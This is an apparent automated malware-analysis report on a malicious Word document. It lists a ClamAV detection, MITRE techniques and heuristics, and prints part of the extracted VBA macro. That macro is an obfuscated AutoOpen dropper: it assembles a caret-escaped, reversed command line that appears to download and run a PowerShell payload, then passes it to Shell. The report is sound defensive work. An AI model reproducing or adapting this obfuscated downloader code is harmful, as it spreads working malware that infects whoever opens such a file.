Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The AutoOpen macro calls the Shell function with a concatenated string, likely intended to download and execute a second-stage payload. ClamAV also detected this file as malware, specifically 'Doc.Malware.Valyria-6794593-0'.
Heuristics (5)
- ClamAV: Doc.Malware.Valyria-6794593-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6794593-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10336 bytes |

SHA-256: 09ad8c0489c3799f20d73715e717f8aa6dbc6a6852417428b57e7a06de58bb67
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ONFNUlnU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim cMiScP(2)
cMiScP(0) = MidB("wCKcT", 200, 533)
cMiScP(1) = MidB("tvMcVmI", 534, 123)
Dim bmidK(1)
bmidK(0) = Right("kVjzD", 478)
Dim SiaZa(2)
SiaZa(0) = Right("NuGkPriA", 530)
SiaZa(1) = Mid("nljkajo", 587, 255)
Dim kUBrwI(1)
kUBrwI(0) = MidB("pBrvcqT", 708, 460)
Dim frokMi(1)
frokMi(0) = Left("zXKMk", 651)
lBhjuWFOwiw (KeyString(3 + 6 + 2 + 0 + 56) + UsodooiQdP + PNERi + iphCaorHWSr + YGNaQkDdLj + vzJXHFNkmsC)
Dim GRPAdh(1)
GRPAdh(0) = MidB("dSAJijEa", 649, 998)
Dim QGQimm(1)
QGQimm(0) = Right("qNzWWtkH", 902)
Dim zYwllh(1)
zYwllh(0) = Left("mAOUF", 798)
End Sub
Function lBhjuWFOwiw(FciQRYwYOP As String)
Dim cIfCJf(2)
cIfCJf(0) = Right("TbvvOwu", 382)
cIfCJf(1) = MidB("PIEEkBE", 347, 308)
Dim VdPcih(1)
VdPcih(0) = MidB("TzhiR", 364, 926)
Dim ECkTEC(1)
ECkTEC(0) = MidB("dhcOlpz", 923, 33)
Dim raQqcr(2)
raQqcr(0) = MidB("PRmwB", 430, 292)
raQqcr(1) = Mid("ozQjV", 144, 718)
Dim tVCNDB(1)
tVCNDB(0) = Left("rHAbE", 250)
Shell@ FciQRYwYOP, CInt(msoBarTypeNormal)
Dim njQZGj(1)
njQZGj(0) = Left("HTiRjP", 177)
Dim INviBd(2)
INviBd(0) = MidB("bEzYfL", 213, 894)
INviBd(1) = Left("FlaFAoc", 49)
Dim RRfIo(1)
RRfIo(0) = MidB("loBAQ", 872, 662)
End Function
Attribute VB_Name = "sXZqiKirpODr"
Function UsodooiQdP()
Dim lVtRWs(2)
lVtRWs(0) = MidB("GhpRmVc", 776, 877)
lVtRWs(1) = Mid("aFXsoz", 608, 296)
Dim tEqXi(1)
tEqXi(0) = MidB("vWjJNURA", 558, 175)
Dim NNbwCn(2)
NNbwCn(0) = Left("RQmwYOC", 594)
NNbwCn(1) = Left("kCqSjtZ", 118)
fTrqvVBAso = "md " + "/" + "V/C" + ChrW(3 + 0 + 3 + 5 + 23) + "s^" + "e^t " + "7^j" + "=^" + " ^ "
Dim GoWPf(1)
GoWPf(0) = MidB("kBdizC", 67, 757)
Dim JZIvLp(1)
JZIvLp(0) = Right("QaSRLTn", 420)
Dim hdctW(2)
hdctW(0) = Left("KdABzm", 998)
hdctW(1) = Right("iSRQjzpu", 318)
ijPWiXfN = "^" + " " + " " + "^ ^" + " ^ " + " ^ " + " ^ "
Dim QuFFiN(2)
QuFFiN(0) = Right("dwzLORPT", 867)
QuFFiN(1) = Right("oECkEM", 375)
Dim NvZiqM(2)
NvZiqM(0) = Left("kWJoi", 747)
NvZiqM(1) = Left("zRKok", 576)
Dim XBXkcT(1)
XBXkcT(0) = Mid("OhJjfTX", 351, 147)
Dim mtCWpp(2)
mtCWpp(0) = MidB("mMYohDP", 76, 358)
mtCWpp(1) = Left("miPQV", 571)
iLErVWlsv = "^ ^" + " ^}" + "}{^h" + "c^t^" + "ac" + "^}" + ";^k" + "aerb"
Dim KiFzM(2)
KiFzM(0) = Right("FmjqT", 748)
KiFzM(1) = Left("mpzlw", 288)
Dim mrPMI(1)
mrPMI(0) = Right("YNnYSTK", 846)
Dim jcqFmj(2)
jcqFmj(0) = MidB("ChtCfUz", 406, 901)
jcqFmj(1) = MidB("mikQC", 274, 123)
Dim cCTrR(1)
cCTrR(0) = Mid("aFiCh", 228, 238)
cVoioUzAS = ";ld" + "d$ " + "m^e" + "^t^I" + "-^e"
Dim EtdSQN(1)
EtdSQN(0) = MidB("rOjjI", 275, 243)
Dim IHXZd(2)
IHXZd(0) = Mid("VjOjdVZE", 950, 645)
IHXZd(1) = Left("BaiQibX", 506)
Dim cjJrN(2)
cjJrN(0) = Mid("CERNFXp", 586, 627)
cjJrN(1) = MidB("whDEPwsi", 185, 400)
Dim QQPrvL(1)
QQPrvL(0) = Right("ZzcnX", 152)
Dim qoOvRc(2)
qoOvRc(0) = Mid("qENndrbh", 855, 136)
qoOvRc(1) = MidB("zYjnG", 548, 549)
jNspwzaMjNH = "ko" + "vnI" + "^;)l" + "dd" + "$ ," + "^"
Dim zvqDA(2)
zvqDA(0) = Left("rVGjic", 105)
zvqDA(1) = Left("ODaXznBq", 32)
Dim ZtChl(2)
ZtChl(0) = Mid("brYsJW", 692, 561)
ZtChl(1) = Mid("jLmXUXS", 924, 488)
iVDTla = "a" + "w" + "S^" + "$" + "(e^" + "l^i^" + "F^da" + "^" + "o" + "^" + "l"
Dim pwOHt(2)
pwOHt(0) = Mid("pbUpoUQ", 130, 710)
pwOHt(1) = Left("vEjquXD", 801)
ApprsTlMaw = "n" + "w" + "^o^" + "D" + "^.^" + "a^" + "T^z"
Dim pGzdij(2)
pGzdij(0) = MidB("msKlPs", 887, 37)
pGzdij(1) = Left("uXRGN", 738)
Dim UWMJS(1)
UWMJS(0) = Mid("YCPnzUXL", 186, 709)
iwwzZG = "^$" + "{^yr" + "t{)^" + "j" + "lw" + "^$^ "
UsodooiQdP = fTrqvVBAso + ijPWiXfN + iLErVWlsv + cVoioUzAS + jNspwzaMjNH + iVDTl
... (truncated)
```